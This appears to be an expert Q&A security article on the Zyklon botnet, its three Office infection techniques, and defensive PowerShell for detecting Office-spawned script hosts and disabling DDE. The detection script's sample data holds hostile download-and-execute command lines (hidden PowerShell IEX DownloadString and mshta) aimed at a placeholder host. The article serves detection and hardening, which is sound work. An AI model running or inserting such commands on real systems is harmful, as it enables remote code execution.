A new malware called Zyklon manipulates three Microsoft Office vulnerabilities. How does Zyklon malware work, and what vulnerabilities does it exploit?
Zyklon malware arrives in a ZIP archive containing a malicious Microsoft Office document that uses one of three techniques to run its dropper.
The botnet malware comes to life when a user opens the archived document, which is typically attached to a phishing email. The exploit runs a PowerShell script that downloads the final payload from the attacker's command-and-control server. From there, the attacker can harvest passwords and cryptocurrency wallet data and use them against the target enterprise's systems.
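Whatever the lure, the chain described above ends the same way on the endpoint: an Office process (or, for the Equation Editor case, EQNEDT32.EXE, which is started by DCOM rather than by Word, so Word never appears as its parent) launches PowerShell or another script host. The following is an added example, not code from the original article, that flags that parent/child pattern. It runs over constructed Sysmon Event ID 1 (process create) records so it works offline; the process names, paths and command lines in the samples are illustrative and the URL is a placeholder.

```powershell
# Added example (not from the original article): flag Office or Equation
# Editor processes that spawn a script host, using Sysmon event 1 fields.

$OfficeParents = @('winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'eqnedt32.exe')
$ScriptHosts   = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe',
                   'cscript.exe', 'mshta.exe', 'rundll32.exe', 'regsvr32.exe')

function Test-SuspiciousOfficeChild {
    # $Event is any object with Image and ParentImage properties (full paths).
    param([Parameter(Mandatory)] $Event)
    $child  = [System.IO.Path]::GetFileName($Event.Image).ToLowerInvariant()
    $parent = [System.IO.Path]::GetFileName($Event.ParentImage).ToLowerInvariant()
    # The Equation Editor has no legitimate reason to start any process.
    if ($parent -eq 'eqnedt32.exe') { return $true }
    return ($parent -in $OfficeParents) -and ($child -in $ScriptHosts)
}

function ConvertFrom-SysmonProcessCreate {
    # Flattens a Get-WinEvent record for Sysmon event 1 into the shape
    # Test-SuspiciousOfficeChild expects.
    param([Parameter(Mandatory)] $Record)
    $data = @{}
    $xml = [xml]$Record.ToXml()
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    [pscustomobject]@{
        Time        = $Record.TimeCreated
        Image       = $data['Image']
        ParentImage = $data['ParentImage']
        CommandLine = $data['CommandLine']
    }
}

# Constructed sample records (not real telemetry); paths and command lines
# are illustrative and the URL is a placeholder.
$Samples = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage.ps1'')"'
    }
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE'
        CommandLine = 'cmd /c mshta http://example.invalid/a.hta'
    }
    [pscustomobject]@{
        Image       = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"WINWORD.EXE" /n "C:\Users\user\Documents\report.docx"'
    }
)

# Filter the constructed samples through the check; a user opening a
# document from Explorer (third sample) does not match.
$Samples | Where-Object { Test-SuspiciousOfficeChild -Event $_ } |
    Format-Table ParentImage, Image, CommandLine -AutoSize

# Live use on a host with Sysmon installed (run from an elevated prompt):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ForEach-Object { ConvertFrom-SysmonProcessCreate -Record $_ } |
#     Where-Object { Test-SuspiciousOfficeChild -Event $_ }
```

The parent list deliberately includes EQNEDT32.EXE as a parent rather than Word spawning it: because the Equation Editor is launched out of process by DCOM, the tell-tale record is the Equation Editor starting a child, not Word starting the Equation Editor. Treat any match as worth investigating, and tune the script-host list to whatever your environment legitimately allows Office to launch.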
The first vulnerability Zyklon exploits is a remote code execution bug in the .NET Framework, CVE-2017-8759. A malicious document gives the attacker the ability to install programs, change data and create accounts with full user rights. The lure document carries an embedded Object Linking and Embedding (OLE) object that, when activated, silently downloads a second malicious .doc file from a URL stored in the object. Microsoft patched the .NET Framework flaw in September 2017.
The second vulnerability is a memory corruption flaw in the Microsoft Equation Editor, CVE-2017-11882. An attacker can use it to execute arbitrary code, and no user interaction beyond opening the document is required. The flaw had been present in the component for roughly 17 years before Microsoft patched it in November 2017.
The third technique abuses the Dynamic Data Exchange (DDE) protocol. Over the past year, attackers have crafted documents whose DDE fields launch malicious droppers, and because DDE is not a macro, the usual macro warnings and macro-blocking policies do not stop it. Microsoft considers DDE a product feature rather than a vulnerability, so there is no patch for it as such. Instead, Microsoft published a security advisory describing registry settings that disable the feature, and later shipped an Office update that turns DDE off in Word by default.
Zyklon can harvest passwords and cryptocurrency wallet data, and the infected machines join a botnet that can be directed to launch denial-of-service attacks against targets of the attacker's choosing. Enterprises and users alike should make sure the two CVEs are patched and that DDE is disabled, since the DDE technique is not addressed by a patch, in order to prevent Zyklon malware infections.
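The DDE mitigation above is a registry change rather than a patch, so it is worth scripting both the change and a check that it is still in place. The following is an added example, not code from the original article or from Microsoft: it writes and verifies the per-user values that disable DDE in Word, in Outlook's Word-based editor and in Excel. The value names and meanings follow Microsoft Security Advisory 4053440 and ADV170021 as I recall them and should be confirmed against the advisory before deployment; the Office version key '16.0' (Office 2016/2019/365) is an assumption, and older installs use 15.0 or 14.0.

```powershell
# Added example (not from the original article): apply and verify the
# per-user registry settings that disable DDE in Word, Outlook's Word
# editor and Excel. Value names assumed from Microsoft advisories 4053440
# and ADV170021; Office version '16.0' is an assumption.

$OfficeVersion = '16.0'
$WordOptions   = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Word\Options"
$WordMail      = "$WordOptions\WordMail"   # Outlook's Word-based mail editor
$ExcelOptions  = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Excel\Options"

# Desired state. AllowDDE: 0 = disable DDE, 1 = allow requests only to an
# already running program, 2 = fully enabled (the pre-update behaviour).
# DontUpdateLinks = 1 stops the automatic field/link update that fires DDE
# on builds without the AllowDDE setting.
$DesiredState = @(
    @{ Path = $WordOptions;  Name = 'AllowDDE';        Value = 0 }
    @{ Path = $WordOptions;  Name = 'DontUpdateLinks'; Value = 1 }
    @{ Path = $WordMail;     Name = 'DontUpdateLinks'; Value = 1 }
    @{ Path = $ExcelOptions; Name = 'DontUpdateLinks'; Value = 1 }
    @{ Path = $ExcelOptions; Name = 'DDEAllowed';      Value = 0 }
    @{ Path = $ExcelOptions; Name = 'DDECleaned';      Value = 1 }
)

function Get-DdeSetting {
    # Returns the DWORD value, or $null when the key or value is absent.
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Disable-OfficeDde {
    # Creates any missing key and forces each value to the desired state.
    foreach ($s in $DesiredState) {
        if (-not (Test-Path $s.Path)) { New-Item -Path $s.Path -Force | Out-Null }
        New-ItemProperty -Path $s.Path -Name $s.Name -Value $s.Value `
            -PropertyType DWord -Force | Out-Null
    }
}

function Test-OfficeDdeDisabled {
    # Warns about every value that is missing or wrong (an absent value reads
    # as $null and therefore fails the comparison); returns $true only when
    # all of them match the desired state.
    $ok = $true
    foreach ($s in $DesiredState) {
        $actual = Get-DdeSetting -Path $s.Path -Name $s.Name
        if ($actual -ne $s.Value) {
            Write-Warning ("{0}\{1} is '{2}', expected {3}" -f $s.Path, $s.Name, $actual, $s.Value)
            $ok = $false
        }
    }
    return $ok
}

# Report the current state, apply the settings, then re-check.
Test-OfficeDdeDisabled
Disable-OfficeDde
Test-OfficeDdeDisabled
```

These are HKCU values, so they protect only the user who runs the script; for a fleet, deliver the same values through Group Policy Preferences or the Office administrative templates and run the check function as a compliance query. Excel's DontUpdateLinks also suppresses legitimate external workbook links, so test it on a pilot group before a wide rollout.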
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)